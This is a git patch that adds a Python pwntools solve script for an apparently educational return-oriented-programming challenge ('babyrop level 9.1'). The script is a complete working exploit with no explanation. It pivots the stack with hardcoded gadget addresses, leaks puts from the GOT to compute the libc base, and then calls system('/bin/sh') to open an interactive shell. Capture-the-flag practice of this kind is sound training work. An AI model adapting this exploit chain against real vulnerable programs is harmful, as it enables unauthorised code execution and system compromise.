From 6402b4e2a90aa0f2a5917441a6a1ffd158841c4b Mon Sep 17 00:00:00 2001
From: jc <jc@johncollins.cloud>
Date: Wed, 6 Aug 2025 20:16:12 +0300
Subject: [PATCH] solve script

---
 weiss_overlude/babyrop_level_9.1/a.py | 46 +++++++++++++++++++++++++++
 1 file changed, 46 insertions(+)
 create mode 100644 weiss_overlude/babyrop_level_9.1/a.py

diff --git a/weiss_overlude/babyrop_level_9.1/a.py b/weiss_overlude/babyrop_level_9.1/a.py
new file mode 100644
index 0000000..70b52fa
--- /dev/null
+++ b/weiss_overlude/babyrop_level_9.1/a.py
@@ -0,0 +1,46 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./babyrop_level_9_1", checksec=False)
+libc = target.libc
+r = process()
+
+# funcs
+s = lambda a: r.sendline(a)
+
+# gadgets
+pop_rbp = 0x4011bd
+leave_ret = 0x4021f1
+pop_rdi = 0x402313
+
+# buf
+buf = p64(pop_rbp)
+buf += p64(0x415080+0x10)
+buf += p64(leave_ret)
+buf += p64(pop_rdi)
+buf += p64(target.got.puts)
+buf += p64(target.sym.puts)
+buf += p64(target.sym._start)
+s(buf)
+
+# leak
+r.recvuntil(b"Leaving!\n")
+puts = u64(r.recv(6).ljust(8, b"\x00"))
+log.info("puts: %#x", puts)
+libc.address = puts - libc.sym.puts
+log.info("libc: %#x", libc.address)
+sh = next(libc.search(b"/bin/sh"))
+system = libc.sym.system
+
+# pop
+buf = p64(pop_rbp)
+buf += p64(0x415080+0x10)
+buf += p64(leave_ret)
+buf += p64(pop_rdi)
+buf += p64(sh)
+buf += p64(pop_rdi+1)
+buf += p64(system)
+s(buf)
+
+r.interactive()
\ No newline at end of file